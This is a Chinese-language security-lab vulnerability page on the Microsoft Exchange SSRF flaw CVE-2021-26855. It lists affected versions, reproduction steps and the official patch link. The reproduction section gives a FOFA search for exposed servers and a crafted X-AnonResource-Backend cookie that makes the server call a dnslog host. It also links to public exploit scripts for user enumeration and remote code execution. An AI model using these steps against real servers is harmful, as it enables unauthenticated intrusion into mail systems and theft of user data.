Exchange SSRF(CVE-2021-26855)-漏洞文库小世界-安全文库-NGC660 安全实验室

Exchange SSRF(CVE-2021-26855)

漏洞简介

Exchange Server是微软公司的是一套电子邮件服务组件,是个消息与协作系统,主要提供包括从电子邮件、会议安排、团体日程管理、任务管理、文档管理、实时会议和工作流等协作应用。在 CVE-2021-26855 Exchange SSRF漏洞中,攻击者可直接构造恶意请求,以Exchange server的身份发起任意HTTP请求,扫描内网,并且可获取Exchange用户信息。该漏洞利用无需身份认证。

影响版本

Exchange 2013 Versions < 15.00.1497.012,
Exchange 2016 CU18 < 15.01.2106.013,
Exchange 2016 CU19 < 15.01.2176.009,
Exchange 2019 CU7 < 15.02.0721.013,
Exchange 2019 CU8 < 15.02.0792.010。

漏洞复现

使用FOFA搜索:app=“Microsoft-Exchange”
访问搜索到的outlook页面
1625623054400-d34a9878-ae6d-4b79-aaf3-49b9bddb7ed8

访问url为:https://xx.xx.xx.xx/owa/auth/x.js(x.js可以随便构造)
构造Cookie信息为:
X-AnonResource=true; X-AnonResource-Backend=dnslog的地址/ecp/default.flt?~3

1625623048493-2d77b3cd-d0ff-4ab1-b888-756a92a42232

执行,刷新dnslog即可看到信息。
1625623043932-32125661-451a-48a3-8022-0fb12aba051d-1

获取邮箱信息

可使用的exp地址:https://github.com/charlottelatest/CVE-2021-26855
可猜解正确的用户名
1625623031238-e79f0263-833a-4e6a-962d-aa6155489ce6

RCE

exp地址:https://github.com/mai-lang-chai/Middleware-Vulnerability-detection/blob/master/Exchange/CVE-2021-26855 Exchange RCE/exp.py
1625623025232-b1549e9d-eed1-401d-bf55-c01435deed1a

修复方案

升级到最新安全版本,微软官方已针对该批漏洞发布相关安全更新补丁,可按照以下链接进行升级:
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855。

参考文章

https://www.freebuf.com/articles/web/265539.html
https://mp.weixin.qq.com/s/kFMfKZTfGtmr9FevGAqwrw

请登录后发表评论

    请登录后查看回复内容